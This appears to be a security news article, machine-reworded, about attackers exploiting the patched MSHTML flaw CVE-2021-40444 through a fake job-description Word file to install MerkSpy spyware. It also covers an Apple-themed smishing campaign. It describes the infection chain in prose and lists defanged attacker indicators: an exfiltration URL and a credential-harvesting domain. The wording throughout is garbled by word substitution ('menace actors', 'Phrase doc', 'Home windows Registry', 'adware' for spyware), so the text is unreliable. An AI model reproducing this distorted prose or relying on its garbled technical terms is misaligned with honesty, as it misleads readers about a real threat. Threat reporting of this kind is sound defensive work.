Unknown menace actors have been noticed exploiting a now-patched security flaw in Microsoft MSHTML to ship a surveillance device referred to as MerkSpy as a part of a marketing campaign primarily concentrating on customers in Canada, India, Poland, and the U.S.
“MerkSpy is designed to clandestinely monitor person actions, seize delicate info, and set up persistence on compromised programs,” Fortinet FortiGuard Labs researcher Cara Lin stated in a report printed final week.
The place to begin of the assault chain is a Microsoft Phrase doc that ostensibly comprises a job description for a software program engineer position.
However opening the file triggers the exploitation of CVE-2021-40444, a high-severity flaw in MSHTML that might end in distant code execution with out requiring any person interplay. It was addressed by Microsoft as a part of Patch Tuesday updates launched in September 2021.
On this case, it paves the way in which for the obtain of an HTML file (“olerender.html”) from a distant server that, in flip, initiates the execution of an embedded shellcode after checking the working system model.
“Olerender.html” takes benefit of “‘VirtualProtect’ to switch reminiscence permissions, permitting the decoded shellcode to be written into reminiscence securely,” Lin defined.
“Following this, ‘CreateThread’ executes the injected shellcode, setting the stage for downloading and executing the following payload from the attacker’s server. This course of ensures that the malicious code runs seamlessly, facilitating additional exploitation.”
The shellcode serves as a downloader for a file that is deceptively titled “GoogleUpdate” however, in actuality, harbors an injector payload accountable for evading detection by security software program and loading MerkSpy into reminiscence.
The adware establishes persistence on the host by way of Home windows Registry adjustments such that it is launched mechanically upon system startup. It additionally comes with capabilities to clandestinely seize delicate info, monitor person actions, and exfiltrate information to exterior servers beneath the menace actors’ management.
This consists of screenshots, keystrokes, login credentials saved in Google Chrome, and information from the MetaMask browser extension. All this info is transmitted to the URL “45.89.53[.]46/google/replace[.]php.”
The event comes as Symantec detailed a smishing marketing campaign concentrating on customers within the U.S. with sketchy SMS messages that purport to be from Apple and purpose to trick them into clicking on bogus credential harvesting pages (“signin.authen-connexion[.]data/icloud”) as a way to proceed utilizing the providers.
“The malicious web site is accessible from each desktop and cellular browsers,” the Broadcom-owned firm stated. “So as to add a layer of perceived legitimacy, they’ve applied a CAPTCHA that customers should full. After this, customers are directed to a webpage that mimics an outdated iCloud login template.”
